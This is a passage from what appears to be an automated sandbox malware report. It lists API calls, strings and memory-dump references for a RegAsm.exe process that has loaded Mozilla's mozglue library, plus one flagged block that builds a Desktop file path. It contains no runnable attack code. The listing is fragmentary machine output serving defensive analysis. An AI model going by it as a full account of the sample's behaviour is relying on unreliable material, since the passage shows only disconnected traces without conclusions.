• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 922945588-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C841D0F
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6C841BE3,?,?,6C841D96,00000000), ref: 6C841D18
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6C841BE3,?,?,6C841D96,00000000), ref: 6C841D4C
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C841DB7
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C841DC0
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C841DDA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C841EF0: GetCurrentThreadId.KERNEL32 ref: 6C841F03
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C841EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C841DF2,00000000,00000000), ref: 6C841F0C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C841EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C841F20
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C841DF4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8384F3
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83850A
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83851E
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83855B
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83856F
                                                                                                                                                                                                                                                                                                  • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8385AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83767F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C837693
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8376A7
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8385B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C801699
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016CB
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016D7
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016DE
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016E5
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016EC
                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8016F9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 375572348-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F619
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C83F598), ref: 6C83F621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F637
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F645
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F663
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C83F62A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                  • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C801FDE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C801FFD
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C802011
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C802059
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4190559335-2197658831
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C82D9F0,00000000), ref: 6C800F1D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C800F3C
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C800F50
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C82D9F0,00000000), ref: 6C800F86
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4190559335-2063391169
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(015721F0,?,00000104,00000000,?,00412455,?,015721F0,00000000), ref: 0041186D
                                                                                                                                                                                                                                                                                                  • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,015721F0,00000000,00000000,?,00412455,?,015721F0,00000000), ref: 0041188B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,00412455,?,015721F0,00000000,?,?,?,?,?,?,?,00000000), ref: 0041189E
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004118B1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s%s$C:\Users\user\Desktop\$U$A
                                                                                                                                                                                                                                                                                                  • API String ID: 1206339513-3117448059
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F559
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F561
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F577
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F585
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F5A3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_resume, xrefs: 6C83F239
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_resume_sampling, xrefs: 6C83F499
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C83F56A
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_pause_sampling, xrefs: 6C83F3A8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                                                                  • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F619
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C83F598), ref: 6C83F621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F637
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F645
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F663
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C83F62A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                  • API String ID: 2848912005-753366533
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,6C800DF8), ref: 6C800E82
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C800EA1
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C800EB5
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C800EC5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C82CFAE,?,?,?,6C7F31A7), ref: 6C8305FB
                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C82CFAE,?,?,?,6C7F31A7), ref: 6C830616
